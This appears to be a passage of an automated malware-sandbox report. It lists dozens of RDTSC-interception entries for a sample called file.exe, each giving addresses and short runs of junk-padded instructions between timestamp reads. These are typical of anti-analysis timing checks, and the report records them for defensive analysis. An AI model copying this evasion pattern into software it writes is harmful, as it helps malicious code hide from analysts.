                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6166D9 second address: 6166DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61682D second address: 616831 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 619723 second address: 619733 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F96F934F1E6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 619733 second address: 61973D instructions: 0x00000000 rdtsc 0x00000002 jno 00007F96F95D6D66h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61973D second address: 619743 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 619743 second address: 619756 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F96F95D6D66h 0x00000009 je 00007F96F95D6D66h 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 619756 second address: 61975C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 619899 second address: 6198A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F96F95D6D6Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6198A7 second address: 6198C7 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F96F934F1E6h 0x00000008 jmp 00007F96F934F1EAh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop ecx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 js 00007F96F934F1E6h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622A0A second address: 622A1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007F96F95D6D6Ch 0x0000000c pop ebx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622A1E second address: 622A24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622A24 second address: 622A2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F96F95D6D66h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 581BC3 second address: 581BE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 jnl 00007F96F934F1F3h 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push esi 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 581BE7 second address: 581BEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 581BEE second address: 581BF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 581BF4 second address: 581BFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 581BFA second address: 581BFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 620B10 second address: 620B43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F96F95D6D72h 0x00000009 jmp 00007F96F95D6D75h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push ebx 0x00000012 push edi 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6212E4 second address: 6212E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62275C second address: 622769 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007F96F95D6D66h 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622769 second address: 622779 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F96F934F1EBh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 625F5B second address: 625F6D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007F96F95D6D66h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 625F6D second address: 625F7B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F96F934F1E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 626461 second address: 62649E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007F96F95D6D66h 0x0000000c jmp 00007F96F95D6D70h 0x00000011 popad 0x00000012 jmp 00007F96F95D6D78h 0x00000017 push eax 0x00000018 push edx 0x00000019 jo 00007F96F95D6D66h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62649E second address: 6264A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62674C second address: 626754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 626754 second address: 62676C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F96F934F1E8h 0x0000000b push edi 0x0000000c pop edi 0x0000000d js 00007F96F934F1E8h 0x00000013 pushad 0x00000014 popad 0x00000015 push ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62BD7A second address: 62BDCE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F96F95D6D7Fh 0x0000000c jmp 00007F96F95D6D79h 0x00000011 pushad 0x00000012 jmp 00007F96F95D6D77h 0x00000017 jmp 00007F96F95D6D75h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62BDCE second address: 62BDEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 jnc 00007F96F934F1E6h 0x0000000f pop ebx 0x00000010 pushad 0x00000011 jg 00007F96F934F1E6h 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62BDEB second address: 62BDF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62BDF0 second address: 62BE07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F934F1F2h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 632FC8 second address: 632FF0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F95D6D6Fh 0x00000007 jmp 00007F96F95D6D75h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6331B8 second address: 6331C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F96F934F1E6h 0x0000000a pop ecx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 633499 second address: 6334BF instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F96F95D6D66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jmp 00007F96F95D6D70h 0x00000010 pop edi 0x00000011 popad 0x00000012 jp 00007F96F95D6D7Bh 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6338B8 second address: 6338BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6338BE second address: 6338DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F95D6D77h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 633BD1 second address: 633C01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jns 00007F96F934F1FDh 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F96F934F1ECh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 633F1E second address: 633F26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 632BAF second address: 632BEF instructions: 0x00000000 rdtsc 0x00000002 jns 00007F96F934F1E6h 0x00000008 jmp 00007F96F934F1EDh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 jmp 00007F96F934F1F5h 0x00000015 jmp 00007F96F934F1ECh 0x0000001a pop edi 0x0000001b pop ecx 0x0000001c push ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 632BEF second address: 632BF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F96F95D6D66h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6373A7 second address: 6373C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F934F1EBh 0x00000007 jmp 00007F96F934F1EBh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6373C7 second address: 6373CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63979D second address: 6397DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F934F1F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007F96F934F205h 0x0000000f jmp 00007F96F934F1F3h 0x00000014 jmp 00007F96F934F1ECh 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6397DD second address: 6397E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6397E5 second address: 6397EB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63FC78 second address: 63FCA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F96F95D6D71h 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007F96F95D6D71h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63FCA5 second address: 63FCAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63FCAB second address: 63FCB5 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F96F95D6D66h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63F68F second address: 63F698 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63F698 second address: 63F69D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63F849 second address: 63F85B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pushad 0x00000007 push esi 0x00000008 je 00007F96F934F1E6h 0x0000000e pop esi 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64FB86 second address: 64FB90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F96F95D6D66h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64F5B4 second address: 64F5BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64F5BA second address: 64F62A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jmp 00007F96F95D6D75h 0x0000000d popad 0x0000000e pop edx 0x0000000f pushad 0x00000010 jmp 00007F96F95D6D6Fh 0x00000015 jmp 00007F96F95D6D74h 0x0000001a pushad 0x0000001b jmp 00007F96F95D6D77h 0x00000020 js 00007F96F95D6D66h 0x00000026 jmp 00007F96F95D6D6Dh 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65184F second address: 651853 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 651853 second address: 651891 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F95D6D76h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007F96F95D6D7Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 jnl 00007F96F95D6D66h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 651891 second address: 651895 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 651895 second address: 6518AF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F96F95D6D6Bh 0x0000000e pushad 0x0000000f popad 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6519CB second address: 6519E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F96F934F1F3h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65808D second address: 65809E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007F96F95D6D66h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65809E second address: 6580AA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65F6A4 second address: 65F6B3 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F96F95D6D66h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65F6B3 second address: 65F6CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F96F934F1EBh 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jbe 00007F96F934F1E6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6669F7 second address: 6669FC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 666D44 second address: 666D4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 666D4A second address: 666DB1 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F96F95D6D66h 0x00000008 jmp 00007F96F95D6D6Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 jmp 00007F96F95D6D77h 0x00000017 ja 00007F96F95D6D83h 0x0000001d jmp 00007F96F95D6D77h 0x00000022 jne 00007F96F95D6D66h 0x00000028 jmp 00007F96F95D6D6Ch 0x0000002d jc 00007F96F95D6D72h 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B584 second address: 66B58A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B58A second address: 66B59A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jg 00007F96F95D6D66h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B6FC second address: 66B729 instructions: 0x00000000 rdtsc 0x00000002 je 00007F96F934F1F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c jmp 00007F96F934F1F1h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B729 second address: 66B72D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66B72D second address: 66B755 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 pushad 0x0000000a jmp 00007F96F934F1F4h 0x0000000f pushad 0x00000010 popad 0x00000011 jbe 00007F96F934F1E6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6740A9 second address: 6740B5 instructions: 0x00000000 rdtsc 0x00000002 js 00007F96F95D6D6Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6740B5 second address: 6740D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F96F934F1F5h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 676852 second address: 676858 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 676858 second address: 67685E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67685E second address: 676862 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67CB41 second address: 67CB45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67CB45 second address: 67CB49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67CB49 second address: 67CB57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67CB57 second address: 67CB5F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67E50E second address: 67E512 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67A02E second address: 67A034 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67A034 second address: 67A038 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68A645 second address: 68A64B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68A64B second address: 68A64F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68A64F second address: 68A660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F96F95D6D6Bh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68A4FC second address: 68A502 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68A502 second address: 68A51E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F96F95D6D66h 0x00000009 jmp 00007F96F95D6D6Ch 0x0000000e push edx 0x0000000f pop edx 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68D3D1 second address: 68D3D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68D3D6 second address: 68D3DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69D159 second address: 69D170 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F96F934F1F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69D564 second address: 69D56A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69D56A second address: 69D57A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007F96F934F1EEh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69D81E second address: 69D823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69D991 second address: 69D997 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69DAE7 second address: 69DAEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69DAEB second address: 69DAF5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F96F934F1E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
